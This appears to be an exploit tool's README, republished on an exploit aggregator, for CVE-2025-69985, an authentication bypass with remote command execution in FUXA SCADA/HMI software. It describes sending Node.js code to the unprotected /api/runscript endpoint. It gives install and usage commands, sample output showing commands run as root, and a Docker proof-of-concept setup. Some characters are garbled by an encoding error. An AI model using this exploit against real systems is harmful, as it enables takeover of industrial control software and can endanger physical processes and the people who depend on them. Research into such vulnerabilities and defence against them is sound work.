## https://sploitus.com/exploit?id=A3B60E4F-DE9F-5D1A-A90F-52D4AA273ACC
FUXA โค 1.2.8 Auth Bypass + RCE (CVE-2025-69985)
## ๐ Description
This Python exploit targets CVE-2025-69985, a critical authentication bypass vulnerability in FUXA (web-based SCADA/HMI software) versions โค 1.2.8. By sending a crafted JSON payload with embedded Node.js code to the unprotected /api/runscript endpoint, it achieves remote command execution as the FUXA process โ capturing full stdout/stderr synchronously in the response.
## ๐ ๏ธ Installation
> [!NOTE]
> To ensure a clean and isolated environment for the project dependencies, it's recommended to use Python's `venv` module.
### OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```
### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
```
## โ๏ธ Usage
```bash
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami
Target : http://localhost:1881
Command: whoami
[*] Preparing payload โ executing: whoami
[*] Sending exploit request to /api/runscript ...
[*] Response status: 200
[+] Command executed successfully (CVE-2025-69985 bypass)!
=== COMMAND OUTPUT ===
"root\n"
======================
======================================================================
Exploit completed!.
======================================================================
```
## ๐ Docker PoC
```bash
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:1881/
```
## ๐ป Example

## ๐ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.